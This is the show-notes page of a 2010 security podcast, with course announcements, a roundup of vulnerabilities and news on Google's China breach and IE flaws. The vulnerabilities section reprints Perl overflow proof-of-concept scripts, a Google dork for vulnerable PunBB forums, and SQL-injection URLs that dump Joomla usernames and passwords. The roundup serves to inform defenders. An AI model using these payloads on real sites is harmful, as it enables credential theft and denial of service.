Episode 53 – Who Ownz an Exploit?

InfoSec Podcast Episode 53 for January 25, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.
Announcements:
Community SANS Atlanta 2010 Spring Schedule has been posted.

FORENSICS 606: Drive and Data Recovery Forensics    2/9/10 to 2/13/10
SEC-502: Perimeter Protection In-Depth    2/22/10 to 2/27/10
AUD-507: Auditing Networks, Perimeters, and Systems    3/15/10 to 3/20/10
MGT-512: SANS Security Leadership Essentials For Managers with Knowledge Compression    4/15/10 to 4/21/10
SEC-566: 20 Critical Security Controls – In Depth    5/17/10 to 5/21/10

Go online to register by going to the SANS website or call (301) 654-SANS(7267).

SANS 2010 Orlando, Fl. March 6 – 15, 2010 (http://www.sans.org/sans-2010/)

Vulnerabilities of Interest:

1. IntelliTamper is subject to a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. This issue allows remote attackers to execute arbitrary machine code in the context of the application. Failed exploit attempts will likely crash the application, denying service to legitimate users.  IntelliTamper 2.07 and 2.08 are vulnerable; other versions may also be affected. Proof-of-concept and exploits are available:
   # H0m3 : S3curity-art.com & Google.com
   # M4!L : Wizard-skh@hotmail.com<mailto:Wizard-skh@hotmail.com> & My@hotmail.it<mailto:My@hotmail.it>
   # usage : perl xpl.pl >>xpl.html
   my $IntelliTamper_html =’<html><head><title>SkuLL-HackeR Home
   World</title></head><body>’ .
   ‘<script defer=”‘ .
   “\x41″ x 3076 .
   ‘”>’ .
   “</body></html>”;
   print $IntelliTamper_html;
2. PunBB is subject to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.  An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.  PunBB 1.3 is vulnerable; other versions may also be affected. Google Dork: inurl: viewtopic.php?pid= Example URL: http://www.sample.com/forum/viewtopic.php?pid=[Xss]
3. The ‘com_gameserver’ component for Joomla! is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Example URL: http://www.sample.com/component/gameserver/?view=gameserver&amp;grp=-1′+union+all+select+1,concat(username,0x3A,password),3,4,5,6,7+from+jos_users%2
4. The ‘com_gurujibook’ component for Joomla! is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.  Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Example URL available: http://www.sample.com/index.php?option=com_gurujibook&amp;task=showPDF&amp;bookid=-32+union+all+select+concat(username,0x3a,password),2,3,4+from+jos_users–
5. The JbPublishDownFp component for Joomla! is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Example URL: http://www.sample.com/[JOOMLA_PATH]/administrator/index.php?option=com_jbpublishdownfp&amp;task=edit&amp;cid[]=-1+union+all+select+concat(username,0x3A3A3A,password)+from+jos_users
6. The Mochigames component for Joomla! is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Example URL: http://www.sample.com/[JOOMLA_PATH]/index.php?view=mochigames&amp;id=99999%27+union+select+1,2,username,4,password,6,7,8,9,10,11,12,13,14,15,16,17+from+jos_users%23&amp;option=com_mochigames&amp;Itemid=80
7. VMware Player is subject to an .m3u skin file local heap overflow.
   # By : Pr0f.SeLLiM
   VMware Player (.m3u Skin File) Local Heap Overflow PoC
   ########################
   ##EBX 41414141
   ##ESP 0012EF6C
   ##EBP 00DA50F8 ASCII “C:Program FilesVMware
   Playerskinscrash.M3u”
   ##ESI 0012EFD8
   ##EDI 014143F8
   ##EIP 7C90EAF0 ntdll.7C90EAF0
   #############################################################
   my $boom=”x41″ x 5000;
   my $file=”crash.dat”;
   open($FILE,”>$file”);
   print $FILE $boom;
   close($FILE);
   print “File Successfully Createdn”;
   #####

News Items of Interest:

News item 1: http://news.bbc.co.uk/2/hi/americas/8478005.stm

A Chinese industry ministry spokesman told the state-run Xinhua news agency that claims that Beijing was behind recent cyber attacks were “groundless”. US Secretary of State Hillary Clinton this week asked China to investigate claims by Google that it had been targeted by China-based hackers.The US search giant has threatened to withdraw from China. “The accusation that the Chinese government participated in [any] cyber attack, either in an explicit or inexplicit way, is groundless. We [are] firmly opposed to that,” the unnamed spokesman of China’s ministry of industry and information technology told Xinhua.

News item 2: http://pajamasmedia.com/instapundit/92423/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+instapundit%2Fmain+%28Instapundit%29

“In order to comply with government search warrants on user data, Google created a backdoor access system into Gmail accounts. This feature is what the Chinese hackers exploited to gain access. Google’s system isn’t unique. Democratic governments around the world — in Sweden, Canada and the UK, for example — are rushing to pass laws giving their police new powers of Internet surveillance, in many cases requiring communications system providers to redesign products and services they sell.”

News item 3: http://seclists.org/fulldisclosure/2010/Jan/474

From: Orn Roswell <orn.roswell () gmail com>
Date: Sun, 24 Jan 2010 23:52:27 +0100
Hello,

I am selling IE 8 remote code execution exploit (not patched by the last Microsoft fix). Working under Windows Vista & Windows 7.

Regards,

[ORN ROSWELL]

News item 4: http://www.computerworld.com/s/article/9148138/Researcher_to_reveal_more_Internet_Explorer_problems
Microsoft’s Internet Explorer (IE) could inadvertently allow a hacker to read files on a person’s computer, another problem for the company just days after a serious vulnerability received an emergency patch.

The problem was actually discovered as long as two years ago but has persisted despite two attempts by Microsoft to fix it, said Jorge Luis Alvarez Medina, a security consultant with Core Security Technologies. He is scheduled to give a presentation at the Black Hat conference in Washington, D.C., on Feb. 3.

News item 5: http://news.cnet.com/8301-13772_3-10440819-52.html?part=rss&subj=news&tag=2547-1_3-0-20

Earlier this month, as reported by AVWeb, the U.S. Federal Aviation Administration issued “special conditions” regarding Boeing’s forthcoming 747-8–the next-generation of its iconic 747 line of planes–aimed at making sure that the new plane’s high-tech networking systems are hack proof.

According to the FAA, the 747-8–which should have its first flight any day now, and which is intended to be a much more efficient and powerful version of the 747 than even its most recent models–”will have novel or unusual design features associated with the architecture and connectivity capabilities of the airplane’s computer systems and networks, which may allow access to external computer systems and networks.”